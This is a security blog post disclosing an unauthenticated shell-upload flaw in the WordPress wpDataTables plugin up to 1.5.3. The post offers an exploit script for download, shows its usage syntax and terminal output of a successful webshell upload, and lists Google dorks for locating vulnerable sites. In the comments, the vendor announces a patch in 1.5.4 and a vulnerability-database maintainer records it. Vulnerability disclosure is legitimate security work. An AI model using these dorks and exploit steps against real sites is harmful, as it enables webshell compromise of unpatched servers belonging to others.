WordPress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability

wordpress datatables

claudio@backbox3:~/claudio$ python wpdatatables_shell_up.py -t http://10.0.0.67/wordpress -f shell.php

   ___ ___               __                                                         
  |   Y   .-----.----.--|  .-----.----.-----.-----.-----.                           
  |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|                           
  |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|                           
  |:      |                |__|                                                     
  |::.|:. |                                                                         
  `--- ---'                                                                         
         ___ ___       ______         __         _______       __    __                
        |   Y   .-----|   _  \ .---.-|  |_.---.-|       .---.-|  |--|  .-----.-----.   
        |.  |   |  _  |.  |   \|  _  |   _|  _  |.|   | |  _  |  _  |  |  -__|__ --|   
        |. / \  |   __|.  |    |___._|____|___._`-|.  |-|___._|_____|__|_____|_____|   
        |:      |__|  |:  1    /                  |:  |                                
        |::.|:. |     |::.. . /                   |::.|                                
        `--- ---'     `------'                    `---'                                
                                                 
                                                        Sh311 Upl04d Vuln3r4b1l1ty 
                                                                <= 1.5.3

                                   Written by:

                                 Claudio Viviani

                               http://www.homelab.it

                                 info@homelab.it
                             homelabit@protonmail.ch

                        https://www.facebook.com/homelabit
                          https://twitter.com/homelabit
                          https://plus.google.com/+HomelabIt1/
               https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

[!] Shell Uploaded
[!] Location: http://10.0.0.67/wordpress/wp-content/uploads/2014/11/shell.php
claudio@backbox3:~/claudio$

Google Dork WordPress WpDataTables

inurl:/plugins/wpdatatables
inurl:codecanyon-3958969
index of "wpdatatables"
index of "codecanyon-3958969"

Download

Download:
         wpdatatables_shell_up.py
         wpdatatables_shell_up.py (Mega Mirror)

Exploit Usage

claudio@backbox3:~$ python wpdatatables_shell_up.py -t http[s]://localhost[:PORT] -f filname
                    python wpdatatables_shell_up.py -t http[s]://localhost[:PORT]/basedir -f filename
  • wpDataTables

    Hi,

    We released a patch where this problem is solved.
    Thank you for pointing to vulnerability; we would be really grateful if you would remove this post.

    • ryan

      What version is the patched one?

      • 1.5.4 version

        • ryan

          Thanks! Added to wpvulndb!

          • ok! Thank you!

          • ryan, if i create the list, can you add the homlelab url links of my old exploits archived on wpvulndb ?

          • ryan

            sure! if you could add the list here – https://github.com/wpscanteam/vulndb/issues – we’ll pick up on them and add them to wpvulndb, or just email me the list

          • Thank you Ryan!, i sended the e-mail 😉